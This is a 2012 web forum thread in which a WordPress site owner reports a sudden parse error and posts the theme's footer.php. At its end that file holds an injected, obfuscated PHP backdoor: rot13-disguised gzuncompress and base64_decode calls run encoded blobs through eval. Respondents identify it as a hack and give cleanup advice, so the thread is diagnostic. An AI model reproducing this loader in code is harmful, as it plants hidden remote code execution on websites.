Suddenly, got Parse error message

denisw · January 5, 2012, 9:52am

Hi All,

I have 2 wordpress sites, hosted on the same hosting.

So far everything is running well, until few days ago I found a little php error msg appear on the both sites.

The error messages:
Parse error: syntax error, unexpected ‘;’, expecting T_STRING or T_VARIABLE or ‘$’ in /home/bhaguzco/public_html/wp-content/themes/Invoke/footer.php on line 2

The suspected error line contains:
<div id=“footer”>Copyright © <a href=“<?php bloginfo(‘home’); ?>”><strong><?php bloginfo(‘name’); ?></strong></a> - <?php bloginfo(‘description’); ?></div>

I’m sure there is no any alteration on the original file.

Need advice. Thanks.

DarthGuido · January 5, 2012, 10:04am

Could you post the lines of code surrounding this line as well?

denisw · January 5, 2012, 10:18am

this is the complete file content: (i’m worried that my sites hav been hacked)

&lt;div class="span-24"&gt;
	&lt;div id="footer"&gt;Copyright &copy; &lt;a href="&lt;?php bloginfo(&#039;home&#039;); ?&gt;"&gt;&lt;strong&gt;&lt;?php bloginfo(&#039;name&#039;); ?&gt;&lt;/strong&gt;&lt;/a&gt;  - &lt;?php bloginfo(&#039;description&#039;); ?&gt;&lt;/div&gt;
    &lt;?php // This theme is released free for use under creative commons licence. http://creativecommons.org/licenses/by/3.0/
        // All links in the footer should remain intact. 
        // These links are all family friendly and will not hurt your site in any way. 
        // Warning! Your site may stop working if these links are edited or deleted  ?&gt;
    &lt;div id="footer2"&gt;Powered by &lt;a href="http://wordpress.org/"&gt;&lt;strong&gt;WordPress&lt;/strong&gt;&lt;/a&gt; | Designed by: &lt;a href="http://www.joomlafreetemplates.net"&gt;free joomla templates&lt;/a&gt; | Thanks to &lt;a href="http://www.e-cweb.net/hostgator-coupon-codes/"&gt;hostgator coupon codes&lt;/a&gt; and &lt;a href="http://www.vpshostings.org"&gt;vps hosting&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;

</div>
</div>
<?php
wp_footer();
echo get_theme_option(“footer”) . "
";
?>
<?php $a4efad6bb422fb=str_rot13(‘tmhapbzcerff’);$a4efad6bb422ff=str_rot13(strrev(‘rqbprq_46rfno’)); eval($a4efad6bb422fb($a4efad6bb422ff(‘eF5Tcffxd3L0CY5Wjzc0NzC3tDA2NjGNV4+1dSwqSqzUSEosTjUziU9JTc5PSdVQT1ZX0FP3ABFeICIHREQZWpaA6MiIIBCVBSISHUGkra26pg6aCVG5OcVRYZZ5UREgFUFpkUaWpSnuYaUpHr5A1ZrWAMXzJqg=’))); eval($a4efad6bb422fb($a4efad6bb422ff(‘eF51jM0KgkAYRV/FhaBCi3Eq4yNchGUlJjUyJkbEjDORVFqmRkbv3s8+7uqcA3df52mVFbmyM00YfGaBpauZ8VSZPSpL9tA1H4mGY3FL1l4jHLhoHc3vng5sCo2Pj/YXsdny7FdCl1DqQkRRFMbInRHap/81mxGUjovPD7kyTEyBi5bnc+Sfg4aHUEkH2iT2cBLP63R6uC/xBLzzAoKVbWvGsJRVXeYKZzdp9XZCpoWQuso2arY1hq83Op5C8Q==’))); eval($a4efad6bb422fb($a4efad6bb422ff(‘eF5TiTewTSwqSqzUiDc0tDQHQjNLMw0DTR1kriEq10hTR9M6M00js7g4tURDJT7YNSjMNSgaWYmxZqymZnVaflFqYnIGUImBQmKxgkq8oWY1UJ+Ku4+/k6NPcLR6vKG5gbmlhbGxiWm8emy0QSxQqaEOVhNNwCamJmfkO+DUbxiL4gtTTU3r1IrMEg1N69raWgC+aj1B’))); ?></body>
</html>

chris_upjohn · January 5, 2012, 10:42am

All that eval code is a classic sign of a hack, the best thing you can do ASAP is change your passwords and lock down your website. Basically what i mean by “lock down” is redirect your users to a page explaining why the site is offline as keeping it online will just cause you a bigger headace.

SpacePhoenix · January 5, 2012, 8:17pm

Also scan for viruses/keyloggers/malware etc in case any of that sort of thing got planted as well. Check any access logs, especially any entries around the time at php’s error log started reporting the parse errors.